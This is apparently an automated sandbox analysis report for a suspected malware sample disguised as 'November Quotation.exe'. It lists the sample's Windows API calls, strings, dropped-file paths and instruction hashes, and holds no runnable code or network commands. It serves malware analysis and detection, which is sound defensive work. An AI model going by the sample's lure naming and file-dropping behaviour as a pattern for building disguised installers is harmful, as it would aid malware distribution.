                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                              • String ID: $;u$: Completed$A$C:\Users\user\AppData\Local\sognenes\iconograph$|ru
                                                                                                              • API String ID: 2246997448-3798089519
                                                                                                              • Opcode ID: 03c9c59eb4c84b91af2bf482532f4491c109ec4953ec4fed60a3dea33e08e02c
                                                                                                              • Instruction ID: 23f2a3ef68cc2ecf1ba22192b5584ba95f97fd263584382d2916c135efe1ecf3
                                                                                                              • Opcode Fuzzy Hash: 03c9c59eb4c84b91af2bf482532f4491c109ec4953ec4fed60a3dea33e08e02c
                                                                                                              • Instruction Fuzzy Hash: 179164B1900215ABDB11AFA1CD85AAF77B8EF85314F14843BF601B72D1DB7C8A41CB69
                                                                                                              APIs
                                                                                                              • DeleteFileW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\November Quotation.exe"), ref: 00405652
                                                                                                              • lstrcatW.KERNEL32(0042F200,\*.*,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\November Quotation.exe"), ref: 0040569A
                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\November Quotation.exe"), ref: 004056BD
                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\November Quotation.exe"), ref: 004056C3
                                                                                                              • FindFirstFileW.KERNEL32(0042F200,?,?,?,0040A014,?,0042F200,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\November Quotation.exe"), ref: 004056D3
                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405773
                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405782
                                                                                                              Strings
                                                                                                              • \*.*, xrefs: 00405694
                                                                                                              • "C:\Users\user\Desktop\November Quotation.exe", xrefs: 00405632
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405637
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                              • String ID: "C:\Users\user\Desktop\November Quotation.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                              • API String ID: 2035342205-513481212
                                                                                                              • Opcode ID: eadf2b4e39dab2a9dc7f50b70c4bb88fb977d26753360483fc9983a540ea92ac
                                                                                                              • Instruction ID: 537a859ffcff897d8cd5f5cf56393fe58197ce41a03b0bffcce20e97483bf088
                                                                                                              • Opcode Fuzzy Hash: eadf2b4e39dab2a9dc7f50b70c4bb88fb977d26753360483fc9983a540ea92ac
                                                                                                              • Instruction Fuzzy Hash: 2441B230500A18E6DB21AB618D89EBF7778DF86719F14813BF805B21D1D77C4981EE6E
                                                                                                              APIs
                                                                                                              • CoCreateInstance.OLE32(00408580,?,00000001,00408570,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\sognenes\iconograph\Folkways, xrefs: 004020F5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateInstance
                                                                                                              • String ID: C:\Users\user\AppData\Local\sognenes\iconograph\Folkways
                                                                                                              • API String ID: 542301482-2186690595
                                                                                                              • Opcode ID: ffa6b33d051242dea0b599afd0b70f87154ad558325d106faae319e39926f61a
                                                                                                              • Instruction ID: 980c83093501945f33440b76d7cafb195365f9a7aefe91f5dd6c45d3bc957592
                                                                                                              • Opcode Fuzzy Hash: ffa6b33d051242dea0b599afd0b70f87154ad558325d106faae319e39926f61a
                                                                                                              • Instruction Fuzzy Hash: 77415C75A00104BFCB00DFA4CD88EAE7BB6EF88315B20456AF905EB2D1DA79ED41CB55
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: !C$ !C
                                                                                                              • API String ID: 0-4112869800
                                                                                                              • Opcode ID: f244a69970be5e3fb7395b2eb28eccf6eedf7c5e0ffd2bc2360b4ba292bdf26c
                                                                                                              • Instruction ID: 9d59628195055c55702702634927743170e9131f895cfb3327bf2ff62f88c604
                                                                                                              • Opcode Fuzzy Hash: f244a69970be5e3fb7395b2eb28eccf6eedf7c5e0ffd2bc2360b4ba292bdf26c
                                                                                                              • Instruction Fuzzy Hash: F2C15971A0021ACBCF18CF68D5905EEB7B2BF98314F26826AD8567B380D7346952CF94
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileFindFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 1974802433-0
                                                                                                              • Opcode ID: 61e4b2d84330adcf7c60f82c7e5d820b6e598669863a6f3568266a41ee9f3ddd
                                                                                                              • Instruction ID: acf40542f5c489c1fe3f42b28250c4c8421c5faf7d3490952b38be557a9d2a1a
                                                                                                              • Opcode Fuzzy Hash: 61e4b2d84330adcf7c60f82c7e5d820b6e598669863a6f3568266a41ee9f3ddd
                                                                                                              • Instruction Fuzzy Hash: BEF0B8B16002109BCB00EFA0CD489AEB378FF08324F20097AF101F30D0D6B899009B2A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                                                              • Instruction ID: 831d3521bb97c66da2d66f325b0a06c49e3003946fd67b3772e4acd4ce90d7ab
                                                                                                              • Opcode Fuzzy Hash: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                                                              • Instruction Fuzzy Hash: DDE17B71900719DFDB24CF58C880BAAB7F5EB44305F15892EE897AB2D1D778A961CF04
                                                                                                              APIs
                                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404221
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404235
                                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404252
                                                                                                              • GetSysColor.USER32(?), ref: 00404263
                                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404271
                                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040427F
                                                                                                              • lstrlenW.KERNEL32(?), ref: 00404284
                                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404291
                                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004042A6
                                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004042FF
                                                                                                              • SendMessageW.USER32(00000000), ref: 00404306
                                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404331
                                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404374
                                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404382
                                                                                                              • SetCursor.USER32(00000000), ref: 00404385
                                                                                                              • ShellExecuteW.SHELL32(0000070B,open,@.C,00000000,00000000,00000001), ref: 0040439A
                                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004043A6
                                                                                                              • SetCursor.USER32(00000000), ref: 004043A9
                                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004043D8
                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004043EA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                              • String ID: $;u$@.C$N$open$|ru
                                                                                                              • API String ID: 3615053054-3904496938
                                                                                                              • Opcode ID: 963217090c97da4adcbcf15c24e762bcbfd2aad3b5ef9f006c5e90e2b7288751
                                                                                                              • Instruction ID: bcd791c445e14c4d77ec78b24435c59c5d20c83db90324e08484bccd48c03535
                                                                                                              • Opcode Fuzzy Hash: 963217090c97da4adcbcf15c24e762bcbfd2aad3b5ef9f006c5e90e2b7288751
                                                                                                              • Instruction Fuzzy Hash: 727181B1A00209BFDB109F60DD85E6A7B79FB84355F04803AFB05B62D1C779A961CF98
                                                                                                              APIs
                                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                              • DrawTextW.USER32(00000000,inelegancy,000000FF,00000010,00000820), ref: 00401156
                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                              • String ID: F$inelegancy
                                                                                                              • API String ID: 941294808-712075244
                                                                                                              • Opcode ID: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                                                              • Instruction ID: f1b70214e96eb8bec3146c709be0bbd1f29e4b49e587d4bf0c97a3ec82ce1e67
                                                                                                              • Opcode Fuzzy Hash: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                                                                              • Instruction Fuzzy Hash: 00417C71400209AFCB058FA5DE459BF7BB9FF44315F00802EF591AA1A0C778EA54DFA4
                                                                                                              APIs
                                                                                                              • lstrcpyW.KERNEL32(00430898,NUL,?,00000000,?,?,?,00405C63,?,?,00000001,004057DB,?,00000000,000000F1,?), ref: 00405ACF
                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405C63,?,?,00000001,004057DB,?,00000000,000000F1,?), ref: 00405AF3
                                                                                                              • GetShortPathNameW.KERNEL32(00000000,00430898,00000400), ref: 00405AFC
                                                                                                                • Part of subcall function 00405972: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BAC,00000000,[Rename],00000000,00000000,00000000), ref: 00405982
                                                                                                                • Part of subcall function 00405972: lstrlenA.KERNEL32(00405BAC,?,00000000,00405BAC,00000000,[Rename],00000000,00000000,00000000), ref: 004059B4
                                                                                                              • GetShortPathNameW.KERNEL32(?,00431098,00000400), ref: 00405B19
                                                                                                              • wsprintfA.USER32 ref: 00405B37
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00431098,C0000000,00000004,00431098,?,?,?,?,?), ref: 00405B72
                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B81
                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405BB9
                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00430498,00000000,-0000000A,0040A514,00000000,[Rename],00000000,00000000,00000000), ref: 00405C0F
                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405C21
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00405C28
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405C2F
                                                                                                                • Part of subcall function 00405A0D: GetFileAttributesW.KERNELBASE(00000003,00402DA7,00442800,80000000,00000003,?,?,?,00000000,0040344F,?), ref: 00405A11
                                                                                                                • Part of subcall function 00405A0D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,0040344F,?), ref: 00405A33
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                              • String ID: %ls=%ls$NUL$[Rename]
                                                                                                              • API String ID: 1265525490-899692902
                                                                                                              • Opcode ID: 0a17e51cce6490609f0f77533b4495ec8614e759a42bed5fb578cd96ca66f47b
                                                                                                              • Instruction ID: 7e8ca1d3d50ba167f29b61b8a94756d2149cb8eb8d1ee9df404c58700b9860d6
                                                                                                              • Opcode Fuzzy Hash: 0a17e51cce6490609f0f77533b4495ec8614e759a42bed5fb578cd96ca66f47b
                                                                                                              • Instruction Fuzzy Hash: B1411671204B19BFD2206B615D49F6B3B6CEF45715F14003AF942B62D2EA7CE9018A7D
                                                                                                              APIs
                                                                                                              • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\November Quotation.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,76F93420,004033E1), ref: 00406098
                                                                                                              • CharNextW.USER32(?,?,?,00000000), ref: 004060A7
                                                                                                              • CharNextW.USER32(?,"C:\Users\user\Desktop\November Quotation.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,76F93420,004033E1), ref: 004060AC
                                                                                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403201,C:\Users\user\AppData\Local\Temp\,76F93420,004033E1), ref: 004060BF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$Prev
                                                                                                              • String ID: "C:\Users\user\Desktop\November Quotation.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 589700163-1861193623
                                                                                                              • Opcode ID: 5d64c10bc97e62ea4a676719e588da5fc07abd2ce6560c5e8650e212b13ecad1
                                                                                                              • Instruction ID: 35fbf6a24d661ac63574abd6f2b5f3cfaee5f5a3e28f3d5ffd4c7fbc13fd6fb5
                                                                                                              • Opcode Fuzzy Hash: 5d64c10bc97e62ea4a676719e588da5fc07abd2ce6560c5e8650e212b13ecad1
                                                                                                              • Instruction Fuzzy Hash: 1F11C81684061299DB30BB148C40A7772E8EF55754F56843FED86732C0E7BC4CA282BD
                                                                                                              APIs
                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,reformandum\desperations\,000000FF,C:\Program Files (x86)\Common Files\actionizing.mon,00000400,?,?,00000021), ref: 0040252D
                                                                                                              • lstrlenA.KERNEL32(C:\Program Files (x86)\Common Files\actionizing.mon,?,?,reformandum\desperations\,000000FF,C:\Program Files (x86)\Common Files\actionizing.mon,00000400,?,?,00000021), ref: 00402534
                                                                                                              • WriteFile.KERNEL32(00000000,?,C:\Program Files (x86)\Common Files\actionizing.mon,00000000,?,?,00000000,00000011), ref: 00402566
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
